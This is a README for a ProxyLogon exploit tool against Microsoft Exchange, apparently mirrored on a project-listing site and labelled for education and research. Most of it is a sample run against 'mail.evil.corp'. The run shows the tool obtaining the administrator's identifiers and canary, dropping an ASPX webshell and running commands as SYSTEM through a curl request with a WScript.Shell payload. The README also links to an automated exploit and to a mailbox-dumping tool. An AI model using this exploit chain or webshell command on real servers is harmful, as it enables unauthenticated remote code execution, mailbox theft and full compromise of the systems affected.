Udyz Proxylogon Save

ProxyLogon Pre-Auth SSRF To Arbitrary File Write

Project README

ProxyLogon Pre-Auth SSRF To Arbitrary File Write

For Education and Research

Usage:

C:\>python proxylogon.py mail.evil.corp [email protected]
Attacking target mail.evil.corp
=============================
Got DN: /o=EVIL CORP/ou=first administrative group/cn=Recipients/cn=Administrator
Got SID: S-1-5-21-175943541-xxxxxxxxxx-3152120021-500
Got session id: a99eda32-xxxx-xxxx-825b-5f1c4a6080e7
Got canary: rOWUk7lmAUC2-5HIlQ4EpGq1rPu959xxxxxxxxxx_xxxxxxx_xxx_a-KJ5WR-9j95yu-JOv3dFY.
=========== It means good to go!!!====
Got OAB id: 2f3d4600-xxxx-xxxx-xxxx-b4a4c1d3fb58
Successful!
(+) Webshell drop at https://mail.evil.corp/owa/auth/evilcorp.aspx
(+) Code: curl -ik https://mail.evil.corp/owa/auth/evilcorp.aspx -d 'exec_code=Response.Write(new ActiveXObject("WScript.Shell").exec("cmd /c whoami").stdout.readall())'
CMD: whoami
nt authority\system

Automatic Exploit: https://github.com/Udyz/Automatic-Proxylogon-Exploit

Dump content and download: https://gitlab.com/gvillegas/ohwaa/

Open Source Agenda is not affiliated with "Udyz Proxylogon" Project. README Source: Udyz/Proxylogon
Stars
123
Open Issues
2
Last Commit
6 months ago
Repository

Open Source Agenda Badge

Open Source Agenda Rating